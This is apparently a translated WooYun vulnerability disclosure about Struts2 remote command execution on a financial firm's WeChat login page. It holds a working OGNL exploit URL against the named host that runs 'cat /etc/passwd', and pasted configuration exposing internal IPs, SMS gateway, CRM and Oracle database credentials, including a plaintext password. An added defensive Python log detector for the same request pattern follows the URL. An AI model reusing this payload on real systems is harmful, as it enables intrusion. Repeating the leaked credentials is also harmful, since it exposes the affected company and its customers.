2015-05-04: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly.
2015-06-18: The vendor has proactively ignored the vulnerability; details are disclosed to the public.
Struts2 command execution at a financial services group (allows intranet penetration, sending SMS through the SMS interface, and hijacking WeChat)
http://wechat.leadbank.com.cn/loginAction.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
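Added here as a defender's example (not part of the original WooYun report): a small Python detector that scans web access logs for a Struts 2 `redirect:` / `redirectAction:` parameter prefix followed by an OGNL expression marker, which is the request shape of the PoC URL above. The log lines are constructed, and the combined-log format and the `decode_query` helper are assumptions.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not taken from the report); lines 2 and 3
# carry the redirect-prefix parameter shape, line 2 single-encoded, line 3 double-encoded.
SAMPLE_LOG = """\
10.0.0.5 - - [04/May/2015:10:00:01 +0800] "GET /loginAction.action?username=bob HTTP/1.1" 200 512
10.0.0.9 - - [04/May/2015:10:00:07 +0800] "GET /loginAction.action?redirect:${%23a%3d1} HTTP/1.1" 302 0
10.0.0.9 - - [04/May/2015:10:00:09 +0800] "GET /loginAction.action?redirectAction:%25%7B1%2B1%7D HTTP/1.1" 302 0
10.0.0.2 - - [04/May/2015:10:00:12 +0800] "GET /static/logo.png HTTP/1.1" 200 4096
"""

# Apache/nginx combined log format (assumed): client, ident, user, [time], "METHOD URL PROTO", status
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

# Vulnerable Struts 2 releases honour the "redirect:" / "redirectAction:" parameter
# prefixes; a "${" or "%{" OGNL marker right after the prefix is the signature to alert on.
# A plain "redirect:/some/path" (no OGNL marker) is deliberately not flagged.
PREFIX_RE = re.compile(r'(?:^|[?&])(redirect|redirectAction):(?:\$|%)\{', re.I)

def decode_query(url: str) -> str:
    """URL-decode twice so both single- and double-encoded markers surface."""
    return unquote(unquote(url))

def find_struts_redirect_ognl(log_text: str) -> list[dict]:
    """Return one record per request whose URL carries a redirect-prefix OGNL marker."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than crash
        ip, ts, method, url, status = m.groups()
        decoded = decode_query(url)
        p = PREFIX_RE.search(decoded)
        if p:
            hits.append({"ip": ip, "time": ts, "method": method,
                         "prefix": p.group(1), "status": status, "url": decoded})
    return hits

if __name__ == "__main__":
    for hit in find_struts_redirect_ognl(SAMPLE_LOG):
        print(hit)
```

Run it over a real access log by passing the file contents to `find_struts_redirect_ognl`; the response status is kept because a 302 with an unexpected body, as in the PoC, is a useful triage signal.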
ws_client_url=http://10.1.1.247:8088/ld_gateway/services/SmsService
ws_client_username=duKAkFMoHco.
ws_client_password=6TjUEhoBSQKehpqH8dpdQA..
#marketing SMS
ws_client_marketing_url=http://10.1.1.247:8088/ld_gateway/services/SmsService
ws_client_marketing_username=fVe5Ku0KK9I.
ws_client_marketing_password=McefExADbZflnVElaHjwrw..
#crm ws url
crm_ws_url=http\://10.1.1.224\:8080/imart/services/WechatService?wsdl
crm_ws_namespace=http\://wechat.webservice.crm.leadbank.com.cn
crm_ws_username=ld_wechat
crm_ws_password=Ld_WeChAt

#local jdbc
##########################################################################------------oracle--------------------------
jdbc.driverClassName=oracle.jdbc.driver.OracleDriver
#for test surroundings LD_WECHART/LD_WECHART
#jdbc.url=jdbc:oracle:thin:@10.1.1.249:1521:ORCL
#jdbc.username=H3hRomSK8bR_zMG_VVhY7Q..
#jdbc.password=H3hRomSK8bR_zMG_VVhY7Q..
#for official surroundings LD_WECHAT/LD_WECHAT0923
jdbc.url=jdbc:oracle:thin:@10.1.1.97:1521:ORCL
jdbc.username=H3hRomSK8bSc3B93RFMddw..
#jdbc.password=H3hRomSK8bT0W4spzVOUfw..
jdbc.password=v__vHAmJze07AwHSXpV5EA..
工程狮会!
Unable to contact the vendor, or the vendor actively refused
Vulnerability Rank: 15 (WooYun rating)